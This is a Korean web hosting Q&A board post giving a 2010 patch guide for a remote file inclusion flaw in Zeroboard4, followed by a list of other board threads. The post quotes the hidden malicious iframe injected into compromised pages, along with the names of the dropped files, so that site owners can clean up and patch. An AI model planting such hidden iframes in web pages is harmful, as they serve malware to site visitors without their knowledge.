마루웹호스팅 :: 웹호스팅, 도메인 등록, 쇼핑몰 호스팅, 이미지 링크, 서버 호스팅, 코로케이션, 서버관리툴, 리셀러, 홈페이지 제작, 무료호스팅 제공
873201-04-154779
 
873201-04-154782
입금확인신청 신청현황보기
1:1 문의

Q&A 게시판



  2010년 12월 22일 RFI 취약점 보안 패치
  김병윤   2010-12-22 16:29:23 16655 

2010년 12월 22일 RFI 취약점 보안 패치

1. bbs/icon 폴더에 생성된 group_qazwsxedc.jpg, visitLog.php 파일 삭제
2. html, php 파일에 삽입된 iframe 소스 삭제
3. 관리자 페이지를 통해 qazwsxedc 그룹 삭제
4. 제로보드설치폴더/_head.php 파일의 13번째 줄 소스 변경(공식 보안 패치 페이지 참고)
5. 제로보드설치폴더/skin/zero_vote/ask_password.php / error.php / login.php 파일의 2번째 줄 소스 각각 변경(공식 보안 패치 페이지 참고)

※ 제로보드 공식 보안 패치
http://www.xpressengine.com/zb4_security/19346851

제로보드4 pl9 버전에서 RFI (원격파일 인클루드) 취약점이 발견되었습니다.

장경칩님께서 제보해주신 내용입니다.

_head.php 파일과 skin/zero_vote/*.php 파일에 대해 아래 내용으로 코드 수정을 통한 패치를 권드립니다.

_head.php

[수정전]

_head.php
view sourceprint?13.if(eregi(":\/\/",$_zb_path)||eregi("\.\.",$_zb_path)||eregi("^\/",$_zb_path)||eregi("data:;",$_zb_path)) $_zb_path ="./";

[수정후]

_head.php: 문자가 $_zb_path에 포함되지 않도록 수정
view sourceprint?13.if(eregi(":\/\/",$_zb_path)||eregi("\.\.",$_zb_path)||eregi("^\/",$_zb_path)||eregi("data:;",$_zb_path)||eregi(":",$_zb_path)) $_zb_path ="./";


skin/zero_vote/ 디렉토리의 아래에 해당되는 .php 파일

        - ask_password.php

        - error.php

        - login.php

[수정전]

./skin/zero_vote/ask_password.php, error.php, login.php
view sourceprint?2.if(eregi(":\/\/",$dir)||eregi("\.\.",$dir)||eregi("^\/",$dir)||eregi("data:;",$dir)) $dir ="./";

[수정후]

./skin/zero_vote/ask_password.php, error.php, login.php
view sourceprint?2.if(eregi(":\/\/",$dir)||eregi("\.\.",$dir)||eregi("^\/",$dir)||eregi("data:;",$dir)||eregi(":",$dir)) $dir ="./";

--------------------------------------------------------------------------------------------



이번달 중순 경부터 악성 웹변조가 있었습니다.

제 사이트도 물론 당했구요.

증상은 main과 index를 포함한 .html .php 파일 하단에 아래 악성코드가 심어집니다.
<iframe src="http://h.nexprice.com/css/x.htm" width=0 height=0></iframe>

저 같은 경우 config.php lib.php 파일에도 iframe 삽입 되어 있었습니다.

그리고, bbs/icon 폴더에 group_qazwsxedc.jpg, visitLog.php 파일이 생성되구요.

★ data 폴더에는 visitLog.php 파일만 생성되어 있었구요.

또한 최고관리자 로그인 후 그룹별 헤더 인크루드 부분에서 iframe 태그가 삽입이 됨니다.


악성코드가 심어진 사이트 접속하면 무한로딩이나 저질로딩(^^;) 또는 바이러스 감지됨니다.

그전에 패치 해주면 좋겠죠..^^

참고로 제로보드4에만 해당됨니다.




안녕하세요 마루인터넷입니다,

좋은 정보 감사합니다.
2010-12-22
 


15057  파일 업로드 에러 서버 설정 상의 문제인 것 같은데요  [1]    배형진 2007/08/07 39040
 2010년 12월 22일 RFI 취약점 보안 패치  [1]    김병윤 2010/12/22 16655
 해외고객을 위한 페이팔(Paypal)결제 안내.       2007/11/08 9872
 홈페이지 변조(악성코드)에 따른 대처법       2009/09/18 8991
15053  대부분의 게시판이 안됩니다.      추연석 2004/02/16 7992
15052  php 소스가 그대로 보여요.      김병윤 2003/12/11 7164
15051  ftp 접속이 안되네요.  [4]    note 2011/08/02 7150
15050  질문에 대한 답변을 메일로 받으시려면...       2006/01/23 6960
 계정 양도 신청 절차 안내.       2006/07/12 6905
15048  트래픽 유발 아이피 차단 바랍니다  [3]    배형진 2007/10/16 6780
15047  호스팅에 대해서 문의요 ^^;;;      이미경 2003/11/25 6762
15046  제로보드 설치 문의      장영철 2003/11/25 6738
15045  FTP 접속이 안됩니다.  [4]    홍경원 2009/05/04 6656
15044  ※ 지워지지 않는 파일 및 폴더 삭제 방법       2005/06/04 6631
15043  호스팅 계정 생성은 얼마나 걸리나요????  [1]    하루일 2003/11/25 6581
15042  호스팅을 신청했는데요.      김미영 2003/11/25 6546
15041    [re] 넵 확인하였답니다.       2003/11/26 6495
15040  제로보드4에서 xe로 옮길려고 합니다.  [1]    안택균 2011/11/04 6493
15039   FTP,SSH 접속 안내 - 접속이 안되는 경우 참조  [3]     2011/11/25 6395
15038  호스팅 상품 문의요~      이상훈 2003/11/25 6366
15037    [re] 서비스 비용에 대하여^^       2003/11/26 6333
15036    [re] 도메인 등록에 대한 답변입니다.^^       2003/11/25 6309
15035    [re] 안녕하세요. 답변드릴께요~^^       2003/11/26 6277
15034    [re] 내일 부터 정상적으로 상담이 될거에요.       2003/11/25 6259
15033    [re] 제로보드 설치에 대한 답변~       2003/11/25 6255
15032  보안 조치 안 해주셔도 됩니다  [2]    배형진 2007/10/15 6112

  1 [2][3][4][5][6][7][8][9][10]..[580]